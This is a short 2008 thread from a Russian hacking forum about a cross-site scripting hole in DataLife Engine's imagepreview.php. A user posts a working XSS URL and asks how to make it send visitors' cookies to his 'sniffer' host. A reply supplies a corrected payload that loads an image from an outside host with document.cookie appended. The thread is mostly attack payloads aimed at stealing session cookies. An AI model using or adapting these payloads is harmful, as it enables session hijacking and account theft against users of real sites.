Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   XSS в DataLife Engine. Обсуждение. (https://forum.antichat.xyz/showthread.php?t=79419)

Dr.Bodja 02.08.2008 13:12
XSS в DataLife Engine. Обсуждение.
 
Есть уязвимость
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.cookie);
Нужно прилепить сниффер, чтобы куки на сниффер шли.

Пробывал так
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location="http://site.ru/s.gif?"+document.cookie);
И так
Код HTML:
_http://target.ru/engine/modules/imagepreview.php?image=javascript:alert(document.location("http://site.ru/s.gif?"+document.cookie));
Подскажите что я делаю не так, и как нужно. Или это вообще невозможно?

ЗЫ: Если подобная тема уже есть, прошу эту удалить, и дать ссылку на более ранею.

Зарание спасибо за помощь.

С ув. DrBodja.

Isis 02.08.2008 13:37
И зачем ты делаешь document.location?
Ты хочешь словить пустые куки?

Цитата:
http://target.ru/engine/modules/imagepreview.php?image=javascript:img=new Image();img.src="http://site.ru/s.gif?"+document.cookie;


Время: 20:53